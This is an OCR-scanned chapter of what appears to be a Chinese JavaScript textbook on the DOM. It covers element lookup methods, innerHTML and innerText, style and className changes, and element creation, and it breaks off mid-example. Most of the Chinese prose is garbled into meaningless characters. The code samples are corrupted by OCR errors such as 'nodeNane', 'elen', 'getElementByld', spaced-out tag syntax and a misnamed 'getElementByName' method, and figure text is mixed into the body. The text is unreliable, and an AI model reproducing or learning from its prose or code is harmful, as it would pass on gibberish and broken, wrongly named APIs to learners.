MEE—DOM

3.1 DOM Eiltifr 48

SCRYXT B (DOM) J& HTML fil XML SCR g B2 82 1. &S24 T % SO 19 25 44 1k
Bk, IF 8 T —Fh o7 2 AT LR 5 o 6 2% 45 A HE AT U ) o DA T TR SR 4 45 A R 2 A
A . DOM K STRS AT Ry — A H 35 SRR 52 CRL 37 Ja M 7 5 I X 5O L a5 i 52 5
AT 5 2 . B2 Web T I AS 5l R 718 5 i 4Ok

—A~ Web U J&— >3RS . 30 AN SCRS AT LA 0 50 #5711 sl /E S HTML IR RS &
K ARAE b 3R T i 0 R R [R]— 4 SRS . SRS X G A R AR T[] — 53 SCRS Y 5 — R
PG A AR 9 7 . DOM & Web T 1T (9 58 4 (9 I 1) X 42 3% 3R, & 66 4% 6 4
JavaScript SFATE F #HEATE K.

W3C DOM 1 WHATWG DOM FrifE 78 4 K 22 B0 BAR 3 U6 2% A XF DOM . i 3 48 512
B, VW E AR AL T X W3C bR iER YR T DT Al s 06 25 B SCRY AT RE A 7E £ Fh N
YA LA HANE B DOM Pila]

fln, W3C DOM w7 T AU i getElementsBy TagName J7 ¥ W6 AR [0 fif /< P >
TCEMHN R AEWT .

//% 3 T& getElementsByTagName J7 1k WhZiiR [ fif < P> JGL &K 151 %=

paragraphs = document. getElementsByTagName("P");
//paragraphs[0] is the first <p> element
//paragraphs[1] is the second < p> element, etc
alert(paragraphs[0]. nodeNane) ;

FRA BEAEFIA) £ Web DU 4 J& M T 2 RO = 80 23 4 20 2L G 9 TE 2 41 40, document
X 5 Fe s SCAY A B table WAL T 4% € 19 HTMLTableElement DOM $% M ijj [a] HTML
RIEE.

AP BRIEF L H 4 T ERA HTML,CSS J JavaScript 4 18 138, #5153 A
TFAR OGN U T 2 S 7E F A A5 8 o 2 7 B b AT R E U b R Rl e
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3.1.1 3KE HTML 15 4%

TR TR 415 1 HTML {1, 2 LRI 55 40 15 47 76 P9 77 T+ 0/ 45 g 3 3 % Bk
DOM H ., 1F B 5 R 5 K 1 F i B9 HUTML 5 S 7 56 25 7 LA JF % 2% 7T L3 3 3
W BEARIERY APT MU s 3K DOM R eh45 5 1 SCRY 0 42 s S0 RS X 24 4. DOM R 1 25 g
X RN 31 R

2

<IDOCTYPE htmi>
<htmi>
<head>
<meta charset="utl-8">

</
ey
<body>
<n1=DOMH</h1>
<buttons EHll</buttons =

<diva [ meta ] [ title ] hi [bmton] [ div ]

e S /7
o gy POMBL g
</body> )
</ntmi> [ span ] [ span ] [ span ]
1 1 1
1 2 3

K 3-1  DOM B (1) 25 46 5 % B ¢ &R

A X DOM B [a], 1T DL 5T P 28176 2 F 47 A 5ORT 38 LI el 38 A D E 2% X
DOM 15 s B AR BB it T 2 Fh R 35 19 75 =,

1. document. getElementByld() 3k EX DOM 5 &

£ HTML #3528 b A Ui 8 id J& MR PR R An 28 i M — . 3% id AT DL T CSSL AR B #
A IEFERR L S IRTE DOM 84 W aT LUK id /RS S m A 8RR I . T kit — B
i B 1 DOM $EUZE | K %= 2) document. getElementByldO W) R A 5 2L ACB AT .

<!—— %8 3 & document. getElementById() [ FEAfEfH = ——>
<!DOCTYPE html >
< html lang = "en">
< head >

< meta charset = "UTF - 8">

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title> Document </title >
</head >
< body >

<div>

<div>
<div>
< button id = "btn">$% 4 </button >

</div>
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</div>
</div>
<h2 id="title">—Frili</h2 >
<h2 id="o0o">% — IR Ei</h2 >
< button id = "o0">% — 1 F% £ </button >
< script >
/7Tl PR B S G N EAT AR id AR

var btn = document. getElementById( 'btn')

console. log(btn) //< button id = "btn">$% £l </button >
var title = document.getElementById('title')
console. log(title) //<h2 id = "title">— " i</h2 >

[/ ERAFFAER id 233& [l null

var btnl = document.getElementById( 'btnl')

console. log(btnl) //null

/ />4 DOM 1% R AEZE P AH [R] id BT 3R B, 19 2 B 45 R 2 e th LA o &R

var oo = document. getElementById('oo")

console. log(oo) //<h2 id = "oo">H — M Hridi</h2 >
</script >
</body >
</html >

WZE G R S id 45 HTML ST B ME— 4531, BT X5 I # e R W2 Ml — /9, AR 7E HTML
JCER PRI TR AR AY id FE A S 5% 5 JavaSeript X T id AR R A9 IR 51 K Iz £
HF HIR [l — 4558 document. getElementByld O & ] T — 0 R & . X ff DOM
T RO A R M B s AR U 2

2. document. getElementByClassName() 3k BX DOM ¥ &

£ HTML #p28 i & class J@ AT LUK A R B0 R H 94 R el — 26 5] . 78 CSS L #4n
I AT X class WSE BE, AT LLER ST FT A [R] class 24 1) HTML & B A E BEE, BT R class J&
PEXT RN B 2 AT R BRI AR HTML #3280 6l — 4, 4% F & 2% document.
getElementByClassName ) 38 Bt DOM 15 #5309 2 4, 2% 2] dnfnf 28 F bR i T class i HTML
JuE AT .

<!—— %8 3 & document. getElementByClassName()FkHX DOM 45 S i &= —— >
<!DOCTYPE html >
< html lang = "en">
< head >

< meta charset = "UTF - 8">

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title > Document </title >
</head >
< body >

<div>

<div>
< div>
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< button class = "elen">f# 4l </button >
</div >
< button class = "elen">% 2 4~ &4 </button >
</div >
</div>
<h2 class = "title">— A frii</h2 >
<h2 class = "00">% — 4 Fr¥i</h2 >
< button class = "elen">% — /%4l </button >
< script >
/118 RN S50 B A5 N B R I class & FK

var elem = document. getElementsByClassName('elem')

/1 AR W TR A7 78, W 2715 8| — > HTMLCollection XF 42, i X 5 5 B 41 J U, fHA H 4 ¥ 4

/11 JE A 7
console. log(elem) //HTMLCollection(3)[button. elem, button.elem, button.elem]
//elen. forEach() //Error

for(var i = 0 ; i< elem.length ;i++){
console. log(elem[1])
/ %
< button class = "elen">J# 4l </button >
< button class = "elen">% 2 >4l </button >
< button class = "elen">% — /N $#4fl</button >
%/
}
//i#id getElementsByClassName( )R 7] [ X} 2 TCi 77 4 JLAS, 15 2 1 45 S 34
//HTMLCollection X} % #E &
var t1 = document.getElementsByClassName('title')

console. log(tl) //HTMLCollection [h2. title]
var t2 = document.getElementsByClassName( 'titlel')
console. log(t2) //HTMLCollection [ ]
</script >
</body >
</html >

document. getElementByClassNameO il X AUt £ A Z A —MRT R T E
PAT 58 5 223 17— A4~ HTMLCollection X 4, iZ % 4 DL RUECAH (2 XA FE . B 4% length
JEME NG R RR Ui Rl T 2 4P . HTMLCollection AN J& Array T35, B LB Tkl
HH Array B JERIXT G b A AEA] J@ Pk 5 7 i 5 B — 2D B A8 B A TR BN A )
] for 416 ¥R ok X% 46 & #4730 I . HTMLCollection J&:— 7 FE 44 » & P HE A9 IC R T
A HTML HAR2% 1 4 5 WUT .

3. document. getElementByTagName () 3£ EX DOM 5 &

i 17 document. getElementByTagName() i) 24 FK 7] A1, % oA & 8 2 HTML #r
B IC R & FRFREL DOM 5 &S 1. document. getElementByTagName() 5 document.
getElementByClassName O i 45 #4 9E 5 2L, A [/ A9 J& » document. getElementByTagName()
JIE A% AN B Z B0 7502 HTML 5 5 AR 25 44 FR BT LA HC A ] 37 5% {8 2 41 i b 45 391 [) 26 AU 1Y
HTML #5145, document. getElementByTagNameO) [ {#i FTZ H1 RS INF .
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<!—— % 3 & document. getElementByTagName () i i FH & ] ——>
<! DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< div>
<div>
<div>
< button class = "elen">F#% 4l </button >
</div>
< button class = "elen">% 2 4~ &4 </button >
</div >
</div>
< h2 class = "title">— 4 frdi</h2 >
< h2 class = "00">% — P pii</h2 >
< button class = "elen">% — >4 </button >
< script >
/¥ R S B e A N B A IR B HIML A5 28 24 Bk (S X 5 KNG )

var btns = document. getElementsByTagName( 'button')

console. log(btns) //HTMLCollection(3) [button. elem, button.elem, button.elem]
var h2s = document. getElementsByTagName( 'H2")
console. log(h2s) //HTMLCollection(2) [h2.title, h2.00]

/12 RATAEAE (b7 255 44 5% W DT 1 A {68 T 1) 4 48 44 44 2% 3R [B] HTMLCollection] ]
var spans = document. getElementsByTagName( 'span')
var xxxs = document. getElementsByTagName( 'xxx')

console. log(spans) //HTMLCollection [ ]
console. log(xxxs) //HTMLCollection [ ]
</script >
</body >
</html >

document. getElementByTagNameO) 7E 1 [0] b5 25 B AN X 43 bR 25 24 BRI R/NG 3R B )
25 5 document, getElementByClassNameO) A1 [/ , 24 2 45 3% 19 70 B AS 76 A R 01 A i FH B
TCRAAAFAERS IR [0 1 45 RAT IR 2 — 25 1 HTMLCollection Xf 42 .

4. document. querySelector() 5 document. querySelectorAllO)

i T document. getElementByXXX () R 51 pR 1Y 5. — PR3k, 7E L PR F R b S A I
R ATk TR B AN B SR B A T CSS iR 52 A Rl i T R AR IO

(1) document. querySelector (CSS #E £ 4% ) . £ XL A 0 15 £ 2% B0 , VT FBE 75 & br fE 1)
LR IR BT AR IRETREGHS 1 MR,

(2) document. querySelector AIICCSS #E£E48) « FF XT A5 A MR 3 £ 258 B0 , DT B4 A s 1
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HICER IR P A EREN T ENES.
document. querySelector () 5 document. querySelector All () f¥ F& A fiff F 22 #, 1055
mr .

<!—— % 3 & document. querySelector( )Y document.querySelectorAll () I {Hi FHZEH ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
<div>
<div class = "oo0">
< div class = "elen">
< button id = "btn" class = "elen">F% 4l </button >
</div>
< button class = "elen">%f 2 > fi 4l </button >
</div>
</div>
< h2 class = "title">— A frii</h2 >
<h2 class = "00">% — A Frfi</h2 >
<button id = "btn" class = "elen">% — - $ 4 </button >
< script >
var oo = document. querySelector('.oo'")
console. log(oo) //< div class = "oo">...</div >
var elems = document. querySelectorAll('.elem')
console. log(elens) //NodeList(4) [div.elem, button.elem, button.elem, button.elem]
elems. forEach(function(item, index) {
console. log(item, index)
/ *
< div class = "elen"> .- </div> 0
< button class = "elen">## 4l </button> 1
< button class = "elen">% 2 N4 </button > 2
< button class = "elen">% — /N % £l </button> 3
x /
1)
[/FRFE CSS [ L BE 4
var btnElems = document.querySelectorAll( 'button[class= "elem"]")
console. log(btnElems) //NodeLiist(3) [button.elem, button.elem, button.elem]
//id BEREAS T M # id JE M T A Ak
var btnl = document. querySelectorAll('# btn')

var btn2 = document. querySelector('# btn')

//querySeletorAll () i BRIE id M — 4k, & 23R W IT A BB AH ] id (9 TCRE S
console. log(btnl) //NodeList(2) [button# btn. elem, button# btn. elem]
//querySeletor () K EU TG IS 1 F AT Fh E 5 &%, & HaR W25 1 D456 AL A oT R
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console. log(btn2) //< button id = "btn" class = "elen">#%{fi</button >
/1253 W) J6 R A 77 AE i)

var xxx = document. querySelector( 'xxx')

var xxxAll = document. querySelectorAll( 'xxx")
//querySeletor() 4>k M null
console. log(xxx) //null
//querySeletorAll()4si& [A]—> 25 1Y) NodeList[ ]
console. log(xxxAll) //NodeList[ ]
</script >
</body >
</html >

document. querySelector() Y document. querySelector AILO &R LL A 5 CSS A1 6] AY
PPFEEE M AT e E A . X 7 5 document. getElementBy XXX () £ %46 2 5
Ji L, ffi ] document. querySelectorO B, T AF G RN A 45 2B KT 1A HB H R 1156 1
MFEMN B TR ENFIEE R, N 23% 1] null, T document. querySelectorAll()
W2 465 B AT 4 FLU) 1) 6 2 58— 1 FE — 4~ NodeList £ 4 . % % & 5 HTMLCollection A
A, & B R RIS % FAFEAE forEach O pR &L, 7 L] LLAd A forEach O bR 30X 45 & 254738 7 .
document. querySelector AIlO 7EAL L id £ 2% 19 A $ B, JEHL id M — M B, 200 ir f7
BEE A id BOGR AR NodeList 4517,

5. H3kE DOM 5 m K7 K& DOM #f

document X% E IR fE1E — 44 N getElementByName () B 58 %, % 28 8007 7 iR 1
name f§ I AR ITC K tagName, M2 TR A F B name J& M. name J& & — 1 LR
PRI JE v, B aE s R TR A M, BT A document. getElementByName O By {# 37 &
ARSI .

<!—— % 3 & document. getElementByName () HJffi ¥z 5 ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA - Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< form action =

nn

>
W44 :< input type = "text" name = "username"> < br >
i 1% :< input type = "text" name = "phone"> < br >
HB 4 :< input type = "text" name = "email"> < br name = "username">
< button name = "sub"> #&3¢</button >
</form >
< div name = "username">¥: 44 2 </div >
< span name = "username">{ 4 3 </span >
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< script >
var username = document.getElementByName( 'username')
console. log(username) //NodeLiist(4) [input, br, div, span]
var phone = document.getElementByName( 'phone')
console. log(phone) //NodeLiist(4) [input]
var sub = document.getElementByName( 'sub')
console. log(sub) //NodeList [button]
var xxx = document. getElementByName( 'xxx")
console. log(xxx) //NodeList [ ]
</script >
</body >
</html >

B4R document. getElementByName Ol % 8 F TR A4 3B 5 (02 REHFTE
name J& PE I 70 R # 2 Z R B P2 B, JF BARFEFE NodeList 1,

Tei i/ document. getElementByXXX () R 41 pREIL J& document. querySelectorXX() F %]
PREY, AR B DOM 5 g 19 5 2R 2 25 1Y, AR S 7E pR AL AT 1Y 3 B b L DOM B B ARy
ST AR WA — P S R B DOM 5 g 3R B =X, Jo 208 FH pR S0 7T 52 306 55 a5 10 A
. £ HTML W5 1 IRWIGR LR, 2B 47—k DOM 15 55 i3 [y, il Jy 2o 7 v 2 2 &
id J& PR T R H AR 2 R VR 0T BN DL id W (EAE A A | A AR AR F .

<t-— 3 E K HEE dEEN TR AR AESRERET —>
<!DOCTYPE html >
< html lang = "en">
< head >

< meta charset = "UTF - 8">

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title> Document </title>
</head >
< body >

<div>

<div>
<div>
< button id = "btn"># 4l </button >

</div>
</div>
</div>
<h2 id="title">— fridi</h2 >
<h2 id="o00">% — ¥ Hi</h2 >
< button id = "o00">% — P F% £l </button >

< script >
console. log(btn) //< button id = "btn">F%#l</button >
console. log(title) //<h2 id = "title">—FRfi</h2 >

console. log(o0o) //HTMLCollection(2) [h2# oo, button# oo, oo: h2 # 0o]
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</script >
</body >
</htnl >

MIUCRWE T id @Y XN DOM X %5k 2 4 1 ah (R 17 31 4 )5 28 & L 783X A
iR i EME— L 255 DOM X4 AR B A FEAEME id ot R, 0253 —4
HTMLCollection Xt % {447 Fr 43 45

BT id BB R AR R S U R 59 DOM 35 i, B2 3% Hffi ] document | 45 5 9
PRI FICAR T R e, AR J5 22 SR AN TR 3-2 U

5 — Yy S T

Coen) () (a=m)
] ifj[alhead 7 &4,
{ifi Fildocument.getElementByld('btn' )i —\
{7 [title 77 24

[ ifj [njmeta 7 £

(meta ] (title ] [nlid="n"]

btn=<button id="btn">
</button>

el

h=<hl></h1>
Revidy R B 2

P [ html 5 4

)

Ui []body 15 £

Uil A B
id A~ PLHg

i [mlbutton 77 .
Ik éid fybtn,
ST B=Y

button
id="btn"

{Fbtn=<button
id="btn"></button>

Bl 32 ARk

WE 3-2 FAHEER , HZH document X5 I A7 78 B AT o] 15 o5 A 4k oR 400, #0 2 fik & —
WX DOM B 388 7 . R XA A BE N E A 1 DOM 5 a5 H 3 31 A8 2248 B0 7 80 4 i fff
FH id B A A8 5 W) o6 2 L 0 2 7E B URTE Y I L 28 R A7 AE 42 )R A o b A I 00 I 4
18 B G2 A7 1 A8 it 5 0 8 2132 70 2 6 0L 14 P A7 sk, MUTT PRS2 I DOM 5 8

2 document H Y R ECR AT T DOM B A WE 7 S2BR b, 7 I 00 A0 2% 52 B i, 30 %
a2t HTML FR%8 2L DOM B4 09 25 14 476 75 I 5109 N AE 1, IF B < body >FI< title >715 51 45
EFE document X% I, DOM #FE document b IYFERESS W& 3-3 Fi 7 .

B R AL document. getElementByld O) p8 % B0 T 20 36 fi# 52 DOM 1) 38 7 51
W)L ACES AR

<!—— %8 3 2 Fi{)l document. getElementById() K%L —— >
<!DOCTYPE html >
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< html lang = "en">
< head >

</

< meta charset = "UTF — 8">

< meta http — equiv = "X - UA - Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>

head >

< body >

1
2
3
4
5
6
7
8
9

< div>
< div class = "o0">
< div class = "elen">
< button id = "btn" class = "elen">## 4l </button >
</div>
< button class = "elen">% 2 4N f# 4 </button >
</div >
</div>
<h2 id="title">— 4 Fpili</h2 >
< h2 class = "00">% — A Fri</h2 >
< button id = "btn" class = "elen">% — 4~ F% 4l </button >
< script >
document. getMyElementById = function(idName) {
/ /3R B body 15 X 5
var body = document. body
/ /B g TR X 4
var targetElem = null
/ /3% 3 PR 2 LoopFind ( X4 Hij i Jj 1915 s X 42, BEDC LI id 44 K )
function loopFind(elem, id) {

//IRAE AR id 54 AT IR Y id AH R, WL R F] targetElen H

if(elem. id === id){
targetElem = elem
telse{
ME#APrFcER TERERBDOMBIER S5

<!DOCTYPE html> :n:mms:[
<html lang="en"> nodeName: "DIV',
<head> nodeType:1,
devalue:null,
<meta charset="UTF-8"> rl|:=.;'ue nu
<meta http-equiv="X-UA-Compatible" content="IE=edge"> chimedes:r
<meta name="viewport" content="width=device-width, initial-scale=1.8"> nodeName: *BUTTON" ,
<title=Document</title> nodeType:1,
nodeValuetnull,
<!head> id:'btn®,
<body>
<div id="d">
<button id="btn">#&f1</button>
7 nodeName: *BUTTON' ,
</div> sodaTypat
<button id="btnl">##2</button> ::?l‘e::l:?
</body> ELAA
</html>

E 3-3 DOM B 7E document |- [ 77 1 45 ¥4
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[N Y HTC R A FIOC R, Stk i FIo R
if(elem. childNodes. length> 0){
var childNodes = elem.childNodes
[/FE T ) F I E Wk B RS T Oou R X A H AR id #E 17 T
childNodes. forEach(function(itemElem) {
loopFind(itemElem, id)
)
}
}
}
loopFind(body, idName)
return targetElem

}
var btn = document.getMyElementById( 'btn')

console. log(btn)
var title = document.getMyElementById('title')
console. log(title)
</script >
</body >
</html >

3.1.2 24 HTML Jg N %

%EESL DOM X G2 1) 72 B I A S 4R O G B, T 2 il 2ok 3R BORE 22 19 DOM. A5 1 52 3%
PEATERAE X W MM LS HAT A F L T, ﬁHFth%mjmzﬁm%L i i
ﬁ ﬁﬁdm??%éﬁﬁﬁ%# TR S T SRR, R P AT R B X B R ) g
WA H., A2 H A AT R AE 2 AR BT P DOM 35 S0 @ PRI 2%, 24 T & #F it JavaScript
XF DOM 75 5508 PN 25 354746 B i, 00 Y 45 2 552 A e 197 75 e 1) 22 4k
. BT HTML B
aﬁr HTML J& 7T PLSE 8% HTML 528 () PO AR 5T, ] A< input >PR 2847 1E type J&
P ZJE T AT LAY RE < input >HRZE1E S e B R LA 2488 0 JE 20 B Cln SR sk 4 1 L 2 e 4%
B AKE B4 #1453 T R i g A A9 O 5K S0 B J R el A2 BE HTML ()& 1 AL RS
wmr .

<U=— 55 3 FE 3.2.1 i# it e Y TP 2 S0 B R s ) AR B HTML [ @ . ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
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< h2 >ERE N input B type J& PE</h2 >

< input type = "text" id="ipt" value = "—>FHLLH ">
< script >
/1RAEH Y input 1 type J& 4
var typeArr = [ 'text', 'password', 'radio', 'checkbox', 'button']
/INT R 0 TF 46
var index = 0

setInterval (function() {
//38 3 B g id A8 5 19 77 27 ] input AR 4
/@ TR B T X He ] PR BUTHE SOt &R 19 s 1k
ipt. type = typeArr[ index]
/L7538 1
indext++
/12875 35 B EA K R B L
if(index == typeArr. length)
index = 0
}
}, 500);
</script >
</body >
</html >

ZEONGES T ENSRBREM TR B BT RO S LAFFETHILR S
0.5 Fb(E 2 % A A8 Ak 3k 2 e F A 1Yl i DOM 8 /E sk A8 e R 241, 2433 DOM
PR Ve AT S R B BRI DOM Y A B R 1A DU b s g s T U
7 R B8 BT RO G 48 8 T PR L Y BT R (A R AR I 2R 1 s L S A A A T ik e T
i I B
2. L HTML A&
ik DOM 5 8 9 AR BURT DA 5 i xT 2. J@ vk iy 7 Xk — D8 E iy Smy A A Je bk,
B 508 B A B IR A5 A B TR KNS, < div >H 1 3CF AR 3< span >
B SCF NSl HTML N # @ M2 J0 vk B4 38 IO 3% 5 1Y, X A s 00 3k 75 24 8] F DOM
TRAER innerHTML & innerText J&1 T, it DOM #:/Ek 2 HTML 451 241,
<!-— % 3% 3.1.2 @1 DOM #:AF B HTML N AR S0 ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >

< body >
<hl id="h">—Frf¥i</hl >



< div id = "demol">

®3E HNERE—DOM

1B
</div>
< div id = "demo2">
%2 B
</div>
< script >
var t = document. getElementById('h")
t. innerHTML = 'Pi7F T A58 4%
var demol = document.querySelector('# demol')
var domo2 = document.querySelector('# demo2"')

console. log(demol. innerHTML)
console. log(demo2. innerText)
demol. innerHTML, =
demo2. innerText =

</script >
</body >
</html >

RPN R 3-4 s,

C O @ 127.0.0.1:5500/83%%203.1.2%20i83 DOMIBIEZEHTML... (h

5 OEm & SE-T

BETHEANE

BXER—BREAARANNE

<p>iXBR<b>—BHAEHA</b>H<u>XF</u>
</p>

¥, hao123

@ Document ®x  +

£ RuLSM mxmn @ F21ess

/151 B
/155 2 B

<p>X H RE<b>— B A RER</b>HI< u> L FE</u></p>'
<p>X B RE<b>— B A RER</b>H<u> L FE</u></p>'

02
8 RMBLLEHE - B.. »

= 4l Elements

TencauSSETTITTO
¥ <body> == $0
<hl id="h">METHBENE</h1>
¥ <div id="demol"=>
¥ <p>
"RER
<b>—ERHAHH</b>
Ilﬂll
<u>XF</u>
</p=>
</div>
<div id="demo2"><p>iXR R <b>—EHWHEN</b>M<u>
HF</u=</p></div>
¥ <script>.</script>

-l oo

html  body
Styles Computed Layout

Console > o : X

iniantad hu liun caraae -

Event Listeners  »
Filter thov .cls + & [€

element.style {

}

Kl 3-4  ZAIH BT AR

BATEM SR ICIEMH H innerHTML J& 18 /& innerText J& M, #B 0T DL 3R B 16 2
DOM 17 St R N HR N2 AR A2 & 1Y inner HTML J& M it &2 &% 19 HTML 452
T LLAE R T A TE B AT O R R L T B Y innerText J& M ) N A WP A& 0] HTML fi§

| 195
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AR AR 2 e U AT
3.1.3 2% CSS FER;

3012 WA T WA i #AE DOM X480 HTML ST R 1Y & 1k 25 A0 A8 SE PR i
f P A S s v, ) W6 8% vhiE O 9 HTML A 25 38 5 18 Bl & 2 2% i A 0 s 80, B DD 2ok
DOM #AEE % HTML JLR R CSS HEURIT R b Rl R T K2 —. ST R ik
KA Z T AR EE RS A AR,
1. MEFH AR style A
it document X RIMIE| A DOM 5S4 H & style BYE, BRI &R AW W17
FELCE A 3 0 2 style J@ PR ] DL B 422 A 20 728 B it 3 ) T b ARG AR
<1-- 8538 313 EALHCE style & ERT LA B0 RS S R IR UL —— >
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title >

</head >
< body >
<div id = "box">
—fP&ETFILER
</div>

<div id = "box1">
H—ANEFILER
</div>
< script >
//3RILITCZ ) DOM Xt 4
var box = document.getElementById( 'box')
/7" X4 style. CSS JE M"Y 5 AT LA BT R 1Y €SS A
box. style. color = '# fff'
box. style. backgroundColor = 'lightblue'
box. style. width = '200px"'
box. style. height = '200px'
/725808 PE 2 A mom — nnn Z5 44 B, AT DAAE ) momNnn (19 05 20 % &
box. style. fontSize = '30px'
box. style. textAlign = 'center'
box. style. lineHeight = '200px'
// 0 DLGE i B 4% fifi FH "key : value ; key: value" ) 5 Xt style #4734 B
boxl. style = 'color: # fff; background — color: red; width: 200px; height: 200px; line —
height:200px'

</script >
</body >
</html >
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it style J& PRSI0 BOREA AT B Ry, W] LU TP A 07 R AT 30 B W RR A O X
0P RE 22 B IR AN R, A IR SE PR TAE 5ok ik 85 p e i BN . 5 BETE A » style
JE M R BEHEATTC R A A B E A RE SRR I 9 19 BURE S U(E, 275 4T R Y 22401 AT IR

<l—— 55385 3.1.3 style JRHk FUAEE 470 2 R0 B, AR A HCHR BIEN 10 190 STRE R —— >
<!DOCTYPE html >
< html lang = "en">
< head >

< meta charset = "UTF - 8">

< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">

< title > Document </title >

< style >

# box{

color: # fff; background — color:red;width:200px; height:200px; 1ine — height:200px
}
</style>
</head >
< body >
< div id = "box" style = "color:white">
—PEFTER
</div>
< script >
//38 i DOM 5 45 B FR BT 5 2 1 style J& Mo R AR AE o0 R 4T N RER 10 45
var box = document.getElementById( 'box')
console. log(box. style. color) //white
console. log(box. style. backgroundColor) /15
/1B IARAT WA B8R, DI 75 223 5 document. defaul tView X 52 2l 4 Hh 4K 75
var boxStyle = document.defaultView.getComputedStyle(box)
console. dir(boxStyle. width) //200px
</script >
</body >
</html >

Z A2z R4 DOM X R style J& ¥ To 2 484 AR AT A RE S X 0 g5 L 02 PR i G
TESAT N U Ge i, £ XA A A BT A 5 DOM 5 s8R A — AN X g2 b, 9 3 82 By 1
TORE G AR AN

(1) f#dr HTML RS A4 i DOM #

(2) fitir CSS KA iAE 2R (StyleRule) B

(3) ¥ DOM # 5 StyleRule #£54 , A= i &8 YL r s B 1Y Render #

(4) ] Render B _E &N T S0 layout O J7 s, T8 84 70 2 SEBRAE R 0T 5 FT Y
x MARFD y AR AR SO SEBR KN A3 FL AN U R WA R AL

(5) P8 Render 4 I A&7 25 H A paint O J7 208 B 23T 5 47 B A oo R L H R
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AR DL v g A0 BRAT R, S BR L 19 5T 1% 70 3R A UK G I 07 B A A R O A B
TRAFAERIE S50 b, TR 70 B O TE G AT A S T B ok . X BUT style X R P ok L)
RAF BT A R RS R OF HAE B — AN U R B 2 B AR i e o, 75 8 30 i o 28008
(907 AT B A X RS2 D R AR IBORE XA i A b i oe R AT T — R S AR A 3
B A BEIR 18T e 5 e il B 45

2. g K%

BEXF CSS R B4R 38 m] LA b 20 A 18 30t A A 5B i, P e s iy 0 sUEE 1
FARME I style JE 4R R PAT P2 BE B 7, X 0 DA O B3 9 A 5 2 28 78 19 0 3% A SO v £ A 4
TR U B AR UM AE DOM 5 s i, 4 26 758 A SO 5 Js0A A ORI AR A 50, e 2
S AT A JRy A2 W WA A B IR AR SR B PR RE

BB AE A U4 7 A IE

<!-- {3 & 3.1.3 MRHEAMITHRTRX ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title >
< style>
# box{
font — size: 26px;
font — weight: bold;
}
. colorl{
color: red;
1
.color2{
color: blue;
}
.color3{
color: green;
}
</style>
</head >
< body >
<div id = "box" >
HelloWorld
</div>
< script >
var box = document.getElementById( 'box')
var styleNameArr = ['colorl', 'color2', 'color3']
var index = 0
setInterval (function() {
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/ /3% LA Y & DOM Y Y class JE MEFE M className AU
box. className = styleNameArr[index]
indext++
if(index == styleNameArr. length) {
index = 0
}
},500)
</script >
</body >
</html >

PARBINE K 2 R EE 5 E I 48 KW TE R class J& P BT B0, 7T LR TT R A5 1)
e B i B R X MR U S PR RE B 5 T 0T A 09, B ATE T S R v 9 R T 5 22 il
AR Ve 937 5 ] LA e A A DD 48 5 3 T 9 B A Sk 380 2 9 42 4 Ik (] 7 5 A9
AR R G5 T 2 style HEATRETE U,

3.1.4 DOM X} ity 4 M43 1%

R A 1520 T DOM X G2 169 48 ORI 4 B 0, 32 F ok 2% > el 48 HTML M 52 1]
#—4 DOM X4,

1. 1% DOM 33 K FHFHRMMEI HTML X4 H

BIHE DOM X 4 85 a7 B4 75 20 2 % inner HTML J& 1 (9 77 28, A 9 =22 1 22 45 10 2%
AT #EFIEFEA DOM X2 inner HTML J& ¥ HP a5 A HTML ARid 37 S AR, 2%
YT 2% L I HTML bR &8 ve e 21 W ot 6] 40 AR 7E< body > PN S Jim— A~ 4% 41, % 1 A 19
DA LY (1

<!l—— 55 3% 3.1.4 fE<body>WNEEM—H4H ——>
<!DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< script >
/ /3B body fit) DOM Xif %
var body = document. body
/ 12k JFE PR 1 R BT R
body. innerHTML = '< button >—>#&4ll</button >'
</script >
</body >
</html >

il %75 X2 B DOM 35 s i B 76 3 70 5 57 vh 2 AF 7 — S8 A, Bl 4 inner HTML
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K 5 A Y DA RIS DA A A AR BT LA B AT X A ST R N RRIB BT T R B 5% L 07 5K
JEARGE A T ORGP WA APT S B ) ™ 5t s s oo R AR

<!—— 55 3% 3.1.4 {E<body>HNIHEM— A ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

> 3

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< script >
